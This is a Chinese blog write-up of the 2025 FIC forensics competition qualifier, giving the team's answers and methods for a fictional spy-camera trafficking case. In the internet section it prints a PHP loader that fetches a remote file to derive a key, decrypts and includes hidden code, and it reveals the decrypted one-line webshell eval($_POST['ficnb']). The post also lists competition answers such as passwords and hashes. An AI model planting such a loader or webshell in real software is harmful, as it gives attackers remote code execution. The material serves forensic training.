2025年fic电子取证比赛

2025年fic电子取证比赛

WL Lv3
  2025-04-26 22:57:54 2025-04-26 22:57:54 Created   2025-04-28 02:19:54 2025-04-28 02:19:54 Updated    

本篇复盘2025年fic电子取证比赛初赛

队伍名:OOQO

总分: 410

排名: 36

正确率: 91.11%

本来有很大概率进决赛的,但是第四部分乱了阵脚,答案好多没交上的…..盘古石再见吧

网页快照以及互联网中部分题目转自FIC25初赛 WriteUP | QingChenyou | Luda’ Blog

网页快照

检材1-网站快照 “老赵商城系统”并非公开推广的普通电商平台,而是一个仅限内部使用、受邀注册的封闭系统。李某利用这套系统,建立起一条以代理人和渠道商为主导的销售链条,将他定制、经过特殊改装的针孔摄像头销售给经过严格筛选的代理成员。

1. 请分析检材一,该取证录像文件的 SHA256 值为

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

image-20250427143547505

2. 请分析检材一,远程取证所使用的 OBS 工具版本号为

29.1.3

3. 请分析检材一,该检材所使用的远程取证的工具名称为

网镜

image-20250427143808685

4. 请分析检材一,在该检材中,远程取证过程中校验的北京时间为

D

A. 2025/4/9 13:33:18

B. 2025/4/9 13:34:18

C. 2025/4/9 13:35:18

D. 2025/4/9 13:36:18

image-20250427143907916

5. 请分析检材一,远程取证的网站 IP 地址为

172.16.10.200

image-20250427144514936

6. 请分析检材一,在该检材中,远程取证的网站密码为

admin123

image-20250427144609271

7. 请分析检材一,在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为

12

视频里面一共给到13页,猜测缺失数据在前13页

数了数没数错的话就是12

8. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计订单的总数为

4000

从视频里面看的

虽然有截图中有200页404的页面,但是也有一个不是404的页面

按照视频里算,答案确实4000

9. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的订单数为【答案格式:200】

未出

10. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的ZK-101产品的订单数为【答案格式:100】

未出

11. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”产品在上海区域的订单数为【答案格式:5】

未出

12. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的销售情况,并计算“赵磊(13967346658)”优惠后的总金额为(例如,优惠率为10%时按原单价的90%计算)【答案格式:4000】

未出

13. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计代理人的最大层级数为(其中顶级代理的用户定义为第1层)【答案格式:3】

5

代理列表缺1,而视频中正好展示的就是第一页

所有层数:

ID1总代理为第一层

第二层 2-28

第三层 30-38

第四层 39-70

第五层 71-100

14. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计每位代理的直接下游人数,并确定直接下游人数排名第一的代理人为【答案格式:张三】

李玲娟

用阿里云进行OCR识别

生成一个数据表格

image-20250426145830130

使用ai给我生成一段python脚本用来转excel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import pandas as pd

input_file = 'data.txt'    # 输入文件路径(例如:data.txt)
output_file = 'output.xlsx'     # 输出Excel文件路径
delimiter = ' '                # 分隔符(制表符用'\t',逗号用',')
has_header = False              # 文件是否有标题行?True=有,False=没有
uppercase_columns = True        # 是否强制列名大写(用于处理中文列名不匹配的情况)
ignore_first_line = False       # 是否忽略第一行(仅在确认是无效数据时使用)

columns = [
    '代理人ID', '姓名', '联系电话', '上级代理ID', '收货地址', '创建时间'
]

try:
    # 根据是否包含标题行选择读取方式
    if has_header:
        # 假设文件第一行是标题行,跳过并指定正确的列名
        df = pd.read_csv(
            input_file,
            sep=delimiter,
            header=0,             # 使用第一行作为标题
            names=columns if uppercase_columns else None,  # 强制列名大写时需手动指定
            encoding='utf-8'
        )
    
    else:
        # 文件无标题行,直接读取数据并指定列名
        df = pd.read_csv(
            input_file,
            sep=delimiter,
            header=None,
            names=columns,
            encoding='utf-8'
        )

    # 额外处理:如果需要忽略第一行数据(如无效数据)
    if ignore_first_line:
        df = df.iloc[1:, :]      # 跳过第一行

except UnicodeDecodeError:
    # 如果编码错误,尝试用gbk编码
    df = pd.read_csv(
        input_file,
        sep=delimiter,
        header=(0 if has_header else None),
        names=columns if (not has_header) else None,
        encoding='gbk'
    )

# 保存到Excel
df.to_excel(
    output_file,
    index=False,
    engine='openpyxl'
    )
print(f"文件已成功保存至:{output_file}")

使用excel生成计数表格

image-20250426152417360

15. 请分析检材一,补充“代理列表”中缺失页面的数据后,根据地址信息统计各区域的代理人数,并确定上海区域的代理人数为【答案格式:10】

5

image-20250426145557628

手机取证

1. 请分析检材二,请分析”手机”检材,并回答,并回答该手机的device_name是?【答案格式:Iphone 16 Pro】

Redmi 6 Pro

全局搜索device_name,成功在props.txt中找到

image-20250427145130475

2. 请分析检材二,请分析”手机”检材,并回答,嫌疑人pc开机密码是什么?【答案格式:abc123】

1qaz2wsx

在note-database里找到这样三条便签,格式是json格式

image-20250427145721025

1
2
3
4
5
6
{"note":[{"format":"HEADING","text":"接头暗号"},{"format":"IMAGE","text":"ub690t1mq9kelnah.png"},{"format":"CHECKLIST_UNCHECKED","text":"说上述暗号"},{"format":"CHECKLIST_CHECKED","text":"地点:香格里拉大酒店大堂"},{"format":"CHECKLIST_CHECKED","text":"黑皮鞋"},{"format":"CHECKLIST_CHECKED","text":"系领带"},{"format":"CHECKLIST_CHECKED","text":"穿西装"}]}

{"note":[{"format":"HEADING","text":"我的博客地址"},{"format":"TEXT","	text":"li.fic"}]}


{"note":[{"format":"HEADING","text":"pc密码"},{"format":"TEXT","text":"1qaz2wsx"}]}

3. 请分析检材二,请分析”手机”检材,并回答,嫌疑人接头暗号是什么?

爱能不能够永远单纯没有悲哀

上题得到暗号所在的图片名,直接去搜ub690t1mq9kelnah.png

image-20250427150005730

4. 请分析检材二,请分析”手机”检材,并回答,嫌疑人存放的秘钥环是多少?

1qaz2wsx

同上上题,便签中已给出,同时这也是解密检材3服务器中谷歌浏览器的密钥坏

5. 请分析检材二,请分析”手机”检材,并回答,嫌疑人一生中最重要的日子是什么时候?

2026-02-26

找不着就翻翻图片,正好找到一个日历的图片

image-20250427150306084

image-20250427150335288

扔给ai算,最后答案为2026-02-26

image-20250427150706855

6.请分析检材三,请分析”手机”检材,并回答,嫌疑人微信生成的聊天记录数据库文件名称是什么?【答案格式:Wx.db】

EnMicroMsg.db

image-20250427150845455

7. 请分析检材二,请分析”手机”检材,并回答,嫌疑人微信账号对应的UIN为多少?【答案格式:123456789】

1864810197

全局搜索uin,在auth_info_key_prefs.xml

image-20250427151239259

8. 请分析检材二,请分析”手机”检材,并回答,嫌疑人微信聊天记录数据库的加密秘钥是什么?

31ad809

微信聊天记录数据库的加密秘钥=md5(IMEI+uin),然后取前七位

IMEI一般默认为1234567890ABCDEF

image-20250427212346863

9. 请分析检材二,请分析”手机”检材,并回答,嫌疑人“欠条.rar”的解压密码是多少?【答案格式:3001234123】

3170010703

记得之前找日历的时候看到了一张带二维码的图片,扫一下可以得到一个手机号3170010703

image-20250427151646369

成功解压

image-20250427152213333

10.请分析检材二,请分析”手机”检材,并回答,嫌疑人“欠条.rar”解压后,其中VeraCrypt容器的MD5值是多少?【答案格式:c788542ea8dcb75ge5768930cq7260kj】不区分大小写

83da62aabc88cb1b23e9469142b67b80

这个欠条就是容器

image-20250427152315186

image-20250427152352186

11. 请分析检材二,请分析”手机”检材,并回答,嫌疑人提供的“欠条.rar”解压后,其中”1.png”图上显示的VeraCrypt容器密码是多少?

#!@KE2sax@!da0h5hghg34&@

image-20250427152430623

12. 请分析检材二,请分析”手机”检材,并回答,嫌疑人李某全名是什么?

李安宏

挂载容器即可看到

image-20250427152635188

13. 请分析检材二,请分析”手机”检材,并回答,嫌疑人欠款金额是多少?

80000

同上

介质取证

1. 请分析检材三,请分析”电脑”检材,并回答,该电脑最后一次开机时间是?

A. 2025/4/15 16:21:41

B. 2025/4/14 11:48:47

C. 2025/4/14 11:49:47

D. 2025/4/14 11:46:47

image

2. 请分析检材三,请分析”电脑”检材,并回答,嫌疑人的备用机号码是多少?

18877332134

开启嵌套虚拟化仿真进去

image-20250427110348814

找到吐槽节假日的这条,全选即可看到

image-20250427111222842

3. 请分析检材三,请分析”电脑”检材,并回答,域名dgy02.com曾保存过一个密码,该密码是多少?

tcgg123456

打开谷歌浏览器会提示要密钥,在手机里有

密钥为1qaz2wsx3edc

然后进到谷歌浏览器里就可以看到密码的记录了

image

4. 请分析检材三,请分析”电脑”检材,并回答,其电脑安装的微信版本是多少?

4.0.0.21

软件商店里有

image

5. 请分析检材三,请分析”电脑”检材,并回答,该系统有哪些远程控制软件

A. todesk B. 向日葵 C. raylink D. 爱思远控

桌面上一个向日葵,然后搜todesk也有,其他两个没找到

image

6. 请分析检材三,请分析”电脑”检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,其记录的日志文件名为

sunlogin_service.log.2

image

7. 请分析检材三,请分析”电脑”检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,日志内记录对方公网IP地址和端口为

116.192.161.222:2577

可以明确看到公网ip和端口

image

8. 请分析检材三,请分析”电脑”检材,并回答,某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”,该文件名为

important.docx

一开始就看这个可疑,一算果然是

image

9. 请分析检材三,请分析”电脑”检材,据调查,上述文件存放了钱包助记词,第一个单词是什么?

solution

把important.docx导出来扔foremost,出来个zip包

image-20250426233841176

里面好多xml文件,一个一个扔到xml解析器里都能解析,但是就有一个扔进去没反应

image-20250426233917469

再把他扔到foremost分离一下,可以发现这其实这是个jpg文件,改一下后缀就可以看到助记词

image-20250426234300560

image-20250426234129779

10. 请分析检材三(“我的测试机”),最近曾访问过的音频文件,该音频文件的文件名是什么

自传小说.MP3

image-20250427102808203

11. 请分析检材三(“我的测试机”),最近曾使用过USB设备,该设备的名称为

thinkplus

image-20250427102841162

12. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人现任妻子毕业的大学是?

北京大学

1
我叫李彦红曾经我只是个在普通不过的家用摄像头卖家日子平淡如水每天守着那小小的店面赚着勉强够糊口的钱我喝柴可惜是在上海大学里相识了那是一段青色美好的时光大学校园的阳光总是那么灿烂洒满了每一个角落第一次见到柴可惜是在学校的图书馆他穿着一条淡黄色的连衣裙揉顺了长发披肩安静的做在窗边看书午后的阳光透过窗户洒在他身上勾勒出一个绝美的轮廓那一刻阿乐心像是被什么击中了后来我们在社团活动中渐渐熟悉起来一起参加志愿者活动一起在校园小径上散步聊天分享彼此的梦想和憧憬周末的时候我们会去学校附建了小吃街吃着便宜又美味的小吃开心了像拥有了全世界那时候的爱情无比纯纯粹没有物质的纷扰我们用心陪伴着彼此学业之余我们最喜欢做的事就是在校园的草坪上铺上一块格子布放上一些简单的零食然后躺下来看着蓝天白云想象着毕业后的生活我们计划着毕业后一起努力工作攒钱买房组建一个幸福的小家庭然而毕业后现实的中担却一点点压垮了我们的爱情得到毕业证书后我开始卖家用摄像头维持生计每天我早出晚归守着那间小小的店铺等待为数不多的顾客上门收入微薄除去房租和日常开销所剩无几日子过了紧巴巴了每一分钱都要精打细算每天睁开眼就是各种生活压力柴米油盐的琐碎让我们曾经美好的爱情渐渐蒙上了阴影为了多赚点钱我尝试了网上电商白天忙着发货处理订单晚上还要学习各种电商运营知识原本以为生活会有转机可电商业务虽有起色却也只够勉强维持自己的温饱无数个夜晚我独自一人坐在电脑前看着那少了可怜的收入满心都是无奈和疲惫没有钱去享受生活甚至不能给柴可惜一个稳定的未来偶尔他会抱怨两句而我除了沉默不知道该如何回应慢慢来我们之间的交流越来越少曾经的甜蜜在贫穷的重压下逐渐消散最终他还是离开了我那段日子我仿佛跌入了无尽的黑暗生活失去了所有的色彩在那之后生活变得更加枯燥无味每天重复着同样的事情起床去店里回家没有任何盼头店里的生意依旧不温不火看着镜子中那个日益消沉满脸疲惫了自己我感到无比绝望银色的流星划过天际在这个平淡如水的日子里我窝在狭小昏暗的出租屋里白无聊赖了在网络世界里游荡电脑屏幕散发了诱光在我脸上投下诡异的光影我像往常一样试图从这虚拟的空间里找寻一丝刺激来驱散生活的乏味与沉闷就在网络的某个角落我结识了网友王德发不知是机缘巧合还是命运的有意安排通过王德发的牵线大大乔我联系上了传说中的陈老板第一次跟陈老板交流是在一个平平无奇的晚上简单的寒暄问候后那不过是一次看起来在普通不过的网上碰面屏幕那头的他给我的第一印象就和大街上匆匆而过的路人没什么两样毫无出彩之处然而随着交流的渐渐深入我才隐隐察觉到这个看似普通的不能在普通的人身上似乎藏着层层迷雾每一次对话都像打开一道通往位置的门让我愈发觉了他深不可测他不经意间流露出来了信息向我暗示了一个隐藏在繁华都市背后的神秘世界一个充斥着各种不为人知门道与资源的地下领域行家一次闲聊中陈老板话风一转突然提到他拥有别人难以想象的货非常规了针孔摄像头和超威摄像头他的语气不急不续却像一颗炸弹在我耳边引爆这些只有在电视剧或电影里才听闻的东西竟然真实了出现在我们的对话中他口中轻轻吐出了每一个字都如同重锤狠狠的撞击着我的心你知道吗这些东西在互联网的某些角落里可都是能卖出天价的宝贝陈老板的声音通过冰冷的耳机仿佛带着一种蛊惑人心的魔力我听着脑海里瞬间浮现出无数奢华的场景宽敞明亮的大房子高档跑车在马路上风驰电掣名牌包包和珠宝堆积如山这些画面如同绚烂的烟火一下子让我的内心被欲望填满那一瞬间我像是在茫茫大海中漂流已久突然看到了一座定为财富的荒岛那种对改变命运的渴望如汹涌的潮水般将我淹没我深信这就是命运赐予我了改变人生轨迹的绝好机会只要抓住他就能从如今这平淡甚至有些贫寒的生活中彻底挣脱出来为了理智个改变命运的机会更进一步我想尽了办法使出浑身解数加到了陈老板的微信密聊中我们在微信的世界里开启了一段隐秘又刺激了交流之旅每一次的对话都像是在进行一场只有我们能懂的神秘案与交流手机屏幕上跳动了每一个字都暗藏深意不敢有丝毫大意我们小心翼翼的试探精心了谋划每一个细节都经过反复的考量与推敲随着交流逐渐深入我越发觉了我们两个人就像命中注定要一起演奏一场疯狂的冒险乐章每一个计划都像乐章中的音符严丝合缝的拼凑在一起很快我们的想法一拍即合一种难以言喻的默契在我们之间迅速蔓延开来如同催化剂一般加速了我们合作计划的推进我仿佛着了魔一般全身心投入到这场罪恶的筹划中全然没有察觉自己正一步步向着深不见底的黑暗深渊滑落前方等待我的僵尸舞尽了深渊与难以挽回了后果我而鄙视了我被财富蒙蔽了双眼看不到任何危险的信号一心只沉醉在即将到来了所谓改变命运的美梦中沿着这条不归路义无反顾的迈进随着商量了深入陈老板开始透露更多细节那些针孔摄像头和超威摄像头的奇妙之处渐渐在我眼前展开他们如此小巧小道可以轻易藏在任何一个不被人注意的角落却拥有着令人惊叹的拍摄能力在他口中这些摄像头仿佛成了能让我们一夜暴富的神奇法宝我们精心制定着每一个营销方案讨论着如何在互联网那些隐秘的角落找到买家如何巧妙的避开监管把这些违规产品推向市场每一个夜晚我躺在床上脑海里都是各种疯狂的计划与设想兴奋的难以入眠仿佛明天一觉醒来我就能成为人人羡慕了富豪然而此刻被欲望蒙蔽双眼的我并不知道自己已经不知不觉踏入了一个暗无千日的犯罪深渊法律的巨往正悄然张开等待着那些胆敢挑战他威严的人而我和陈老板就像两只不知死活的飞蛾正不顾一切的朝着危险的火焰扑去即将迎接我们呢将会是残酷的审判与无尽的悔恨可是在那个时候我们眼中只有金钱和所谓的未来完全忽视了脚已经断裂了道德与法律的桥梁不顾一切的朝着黑暗飞奔而去马上我们相约在香格里拉大酒店其实这只是暗语真正的地点是一家业内专注于黑灰产交易的秘密地点位于市中心闺民老千管辖了棋牌室的后院棋牌室看上去就是一个普通的棋牌室门口挂着一块有些陈旧的招牌灯光昏黄走进里面烟气弥漫几张麻将桌旁围满了人嘈杂声不绝于耳这里表面上就是人们休闲娱乐的场所但实机暗藏玄机棋牌室已经存在很多年了没老千是卓里的老板他身材矮小皮肤黝黑脸上总是带着一丝神秘的微笑年轻时他也是在社会底层摸爬滚的后来不知怎么地就涉足了黑会产凭借着自己的聪明和狠辣逐渐建立起了自己的势力范围小明棋牌室就是他的一个重要据点通过这个看似普通的场所暗中进行着各种非法交易后院有一扇不起眼的小门只有真正的业内人士才知道门后的秘密门后是一个隐蔽的空间各种违禁物品在这里流转是黑会产交易的一个关键枢纽事后接手这笔违禁摄像头的买卖我就开始游走于推测 telegram 等平台上寻找买家每天我在这些平台上小心翼翼的发布信息寻找着那些对这些违禁品感兴趣的人日子一天天过去生意渐渐有了起色接手这笔违禁摄像头的买卖后我的世界~~~~~~后面略

可以自己听听一下音频,或者直接扔给ai,根据音频可得,嫌疑人后来得知他现任妻子是从北京大学毕业的

13. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人是通过一个朋友认识的陈老板,该朋友姓氏拼音是?

wang

王德法

image-20250427104636150

14. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人所说的香格里拉大酒店实则是?

棋牌室

image-20250427104557960

15. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人银行密码是多少?

071492

音频其实是分段的,提取每段的第一个字,可以自己听一下,取谐音

我得银行密马事……

我的银行密码是:071492(不确定…但是应该是6位)

只要ai够猛,一个G也能给你全转成文字,像我们这种没米的,只能用用网上的免费的语音转文字网站咯~~,后面还忒自己听……

互联网取证

警方在服务器中发现了疑似陈某的网站域名,通过该域名警方成功找到陈某的互联网身份和相关ip。请选手固定所有题目相关互联网部分内容

1.请分析检材二,找到李某上游人员陈某博客宣传所用域名为【答案格式:forensix.cn】

chen.foren6

手机微信里找到这样的一张照片

image-20250427111501629

2.请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册

A. ETH(https://ens.domains/)

B. HNS(https://handshake.org/)

C. BTC(https://bitcoin.org/)

D. Namecoin(https://www.namecoin.org/)

博客中好多处提到了hns,而且ai搜一下,也只有hns最适合

image-20250427111808787

image-20250427112010824

image-20250427112225520

3.请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个【答案格式:1】

2

直接访问老博客访问不了

image-20250427234212792

image-20250427234324479

根据他建站笔记说的,找到hnsdbs

image-20250427234412567

自己的网卡改一下这个

image-20250427234720797

正常应该能执行下面的命令

1
nslookup -type=NS foren6

然后就可以看到有两个域名解析服务器(DNS),这样下面四个题也就都能做了,我的dns出了些问题,nslookup一直无法正常执行,现正在解决中….

4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

5 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为

6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为

7. 请分析陈某宣传所用域名,该域名DNS记录没有以下那个域名10.00 分

A. admin.chen.foren6

B. caidan.chen.foren6

C. fichen.foren6

D. hl.chen.foren6

8.请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名为

chewhaoN.github.io

前面我们找到了github,这里的答案也就出来了

image-20250428003326855

9.请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件

2

最后有点慌交了个1

下载源仓库和这个仓库的文件

image-20250427223203634

简单对比下是多了一个文件的(这就是为什么交了个1)

然后使用WinMerge进行详细对比

image-20250427223445139

这怎么会有这么多不同呢,显然不可能,我们比较一下

image-20250427223517784

这里WinMerge就提示我们了,很多换行符不同,我们去调整一下

image-20250427223632965

然后你就会发现有两处不同

image-20250427223742672

image-20250427223751980

所以是2个

10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底

蜂蜜锅底

下载2Moons

image-20250428003526938

根据第九题的文件差异,定位到block.textformat.php

image-20250428003941288

image-20250428004234172

11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为

ficnb

喂给ai

image-20250428004330845

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$a = file_get_contents('https://foren6.atwebpages.com/woyao/eat/火锅/蜂蜜锅底.css');
$b = md5($a, true);
$c = file_get_contents('../../../../encrypted.bin');
$d = base64_decode($c);
$e = 'aes-256-cbc';
$f = openssl_cipher_iv_length($e); 
$g = substr($d, 0, $f);
$h = substr($d, $f); 
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g); 
$j = sys_get_temp_dir();
$k = $j . '/func_' . uniqid() . '.php';  #创建一个唯一的临时 PHP 文件名,并将其存储在变量 $k 中。  uniqid() 函数生成一个唯一的 ID
file_put_contents($k, "<?php\n" . $i);   #将解密后的 PHP 代码(变量 $i)写入临时 PHP 文件 $k。  "<?php\n"  是 PHP 文件的起始标记。
include $k; 
unlink($k); 
yijuhua(); ?>

只看倒数第四行代码,可以看出来进行了$k和$i两个变量的拼接,而且<?php是很明显的一句话马的标志,echo一下$i和$k试试

记得整理一下encrypted.bin和蜂蜜锅底.css的位置,可以换成绝对路径,蜂蜜锅底.css如果编码过不去,那就换个别的英文或数字的名字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$a = file_get_contents('G:\fic2025\1.css');
$b = md5($a, true);
$c = file_get_contents('encrypted.bin'); #也可以直接换成里面的值
$d = base64_decode($c);
$e = 'aes-256-cbc';
$f = openssl_cipher_iv_length($e); 
$g = substr($d, 0, $f);
$h = substr($d, $f); 
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g); 
$j = sys_get_temp_dir();
$k = $j . '/func_' . uniqid() . '.php';
file_put_contents($k, "<?php\n" . $i); 
echo $i;
echo $k;

最后成功得到

1
2
3
4
function yijuhua() 
{  echo "Kangle is OK! FIcer is good!"; 
eval($_POST["ficnb"]);
}

image-20250428021816566

以下貌似比赛时没出/没交上????(就…最后这搞得挺抽象的,一直在乱)

12.请访问陈某当前博客,陈某课程的扫码报名地址的域名为

fic.forensix.cn

扫码看下结果

image-20250427224002037

fic.forensix.cn

13.请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为

柳如烟大战霸天虎

image-20250427224143368

这里有一个老博客

分析下源码

1
<a class="main-nav-link" href="http://forensix2025.work.gd">老博客</a>

http://forensix2025.work.gd就是老博客地址

来到互联网档案馆https://web.archive.org/

image-20250427224350020

发现有两个结果,第一个是可以进去的
image-20250427224420252

明显可以看到标题是柳如烟大战霸天虎

14.请分析陈某旧博客,陈某的姓名为

陈浩北

上面的图片直接就能看到了

image-20250427233018939

15.请分析陈某旧博客,陈某的邮箱地址为

[email protected]

查看网页源码

image-20250427233218499

16.请分析陈某旧博客,陈某的11位手机号为

13170010703

image-20250427233246548

17.请分析陈某旧博客,陈某最爱的dota英雄为

D

A. 赏金猎人B. 幻影刺客C. 斧王D. 邪影芳灵

没玩过dota,就不能考lol?吃了玩游戏玩的少的亏了

image-20250427224941466

搜下看看?

image-20250427225008327

很明显了,邪影芳灵

image-20250427225049601

牛魔的,我一个十年lol玩家你给我考dota

  • Title: 2025年fic电子取证比赛
  • Author: WL
  • Created at : 2025-04-26 22:57:54
  • Updated at : 2025-04-28 02:19:54
  • Link: https://redefine.ohevan.com/2025/04/26/2025fic初赛/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
2025年fic电子取证比赛
  1. 网页快照
    1. 1. 请分析检材一,该取证录像文件的 SHA256 值为
    2. 2. 请分析检材一,远程取证所使用的 OBS 工具版本号为
    3. 3. 请分析检材一,该检材所使用的远程取证的工具名称为
    4. 4. 请分析检材一,在该检材中,远程取证过程中校验的北京时间为
    5. 5. 请分析检材一,远程取证的网站 IP 地址为
    6. 6. 请分析检材一,在该检材中,远程取证的网站密码为
    7. 7. 请分析检材一,在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为
    8. 8. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计订单的总数为
    9. 9. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的订单数为【答案格式:200】
    10. 10. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的ZK-101产品的订单数为【答案格式:100】
    11. 11. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”产品在上海区域的订单数为【答案格式:5】
    12. 12. 请分析检材一,补充“订单列表”中缺失页面的数据后,统计已完成订单中“老李监控批发”的销售情况,并计算“赵磊(13967346658)”优惠后的总金额为(例如,优惠率为10%时按原单价的90%计算)【答案格式:4000】
    13. 13. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计代理人的最大层级数为(其中顶级代理的用户定义为第1层)【答案格式:3】
    14. 14. 请分析检材一,补充“代理列表”中缺失页面的数据后,统计每位代理的直接下游人数,并确定直接下游人数排名第一的代理人为【答案格式:张三】
    15. 15. 请分析检材一,补充“代理列表”中缺失页面的数据后,根据地址信息统计各区域的代理人数,并确定上海区域的代理人数为【答案格式:10】
  2. 手机取证
    1. 1. 请分析检材二,请分析”手机”检材,并回答,并回答该手机的device_name是?【答案格式:Iphone 16 Pro】
    2. 2. 请分析检材二,请分析”手机”检材,并回答,嫌疑人pc开机密码是什么?【答案格式:abc123】
    3. 3. 请分析检材二,请分析”手机”检材,并回答,嫌疑人接头暗号是什么?
    4. 4. 请分析检材二,请分析”手机”检材,并回答,嫌疑人存放的秘钥环是多少?
    5. 5. 请分析检材二,请分析”手机”检材,并回答,嫌疑人一生中最重要的日子是什么时候?
    6. 6.请分析检材三,请分析”手机”检材,并回答,嫌疑人微信生成的聊天记录数据库文件名称是什么?【答案格式:Wx.db】
    7. 7. 请分析检材二,请分析”手机”检材,并回答,嫌疑人微信账号对应的UIN为多少?【答案格式:123456789】
    8. 8. 请分析检材二,请分析”手机”检材,并回答,嫌疑人微信聊天记录数据库的加密秘钥是什么?
    9. 9. 请分析检材二,请分析”手机”检材,并回答,嫌疑人“欠条.rar”的解压密码是多少?【答案格式:3001234123】
    10. 10.请分析检材二,请分析”手机”检材,并回答,嫌疑人“欠条.rar”解压后,其中VeraCrypt容器的MD5值是多少?【答案格式:c788542ea8dcb75ge5768930cq7260kj】不区分大小写
    11. 11. 请分析检材二,请分析”手机”检材,并回答,嫌疑人提供的“欠条.rar”解压后,其中”1.png”图上显示的VeraCrypt容器密码是多少?
    12. 12. 请分析检材二,请分析”手机”检材,并回答,嫌疑人李某全名是什么?
    13. 13. 请分析检材二,请分析”手机”检材,并回答,嫌疑人欠款金额是多少?
  3. 介质取证
    1. 1. 请分析检材三,请分析”电脑”检材,并回答,该电脑最后一次开机时间是?
    2. 2. 请分析检材三,请分析”电脑”检材,并回答,嫌疑人的备用机号码是多少?
    3. 3. 请分析检材三,请分析”电脑”检材,并回答,域名dgy02.com曾保存过一个密码,该密码是多少?
    4. 4. 请分析检材三,请分析”电脑”检材,并回答,其电脑安装的微信版本是多少?
    5. 5. 请分析检材三,请分析”电脑”检材,并回答,该系统有哪些远程控制软件
    6. 6. 请分析检材三,请分析”电脑”检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,其记录的日志文件名为
    7. 7. 请分析检材三,请分析”电脑”检材,并回答,电脑2025年4月10日11点4分29秒曾被向日葵远程控制,日志内记录对方公网IP地址和端口为
    8. 8. 请分析检材三,请分析”电脑”检材,并回答,某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”,该文件名为
    9. 9. 请分析检材三,请分析”电脑”检材,据调查,上述文件存放了钱包助记词,第一个单词是什么?
    10. 10. 请分析检材三(“我的测试机”),最近曾访问过的音频文件,该音频文件的文件名是什么
    11. 11. 请分析检材三(“我的测试机”),最近曾使用过USB设备,该设备的名称为
    12. 12. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人现任妻子毕业的大学是?
    13. 13. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人是通过一个朋友认识的陈老板,该朋友姓氏拼音是?
    14. 14. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人所说的香格里拉大酒店实则是?
    15. 15. 请分析检材三(“我的测试机”)中的音频内容,并回答,嫌疑人银行密码是多少?
  4. 互联网取证
    1. 1.请分析检材二,找到李某上游人员陈某博客宣传所用域名为【答案格式:forensix.cn】
    2. 2.请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册
    3. 3.请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个【答案格式:1】
    4. 4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为
    5. 5 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为
    6. 6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为
    7. 7. 请分析陈某宣传所用域名,该域名DNS记录没有以下那个域名10.00 分
    8. 8.请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名为
    9. 9.请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件
    10. 10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底
    11. 11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为
    12. 12.请访问陈某当前博客,陈某课程的扫码报名地址的域名为
    13. 13.请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为
    14. 14.请分析陈某旧博客,陈某的姓名为
    15. 15.请分析陈某旧博客,陈某的邮箱地址为
    16. 16.请分析陈某旧博客,陈某的11位手机号为
    17. 17.请分析陈某旧博客,陈某最爱的dota英雄为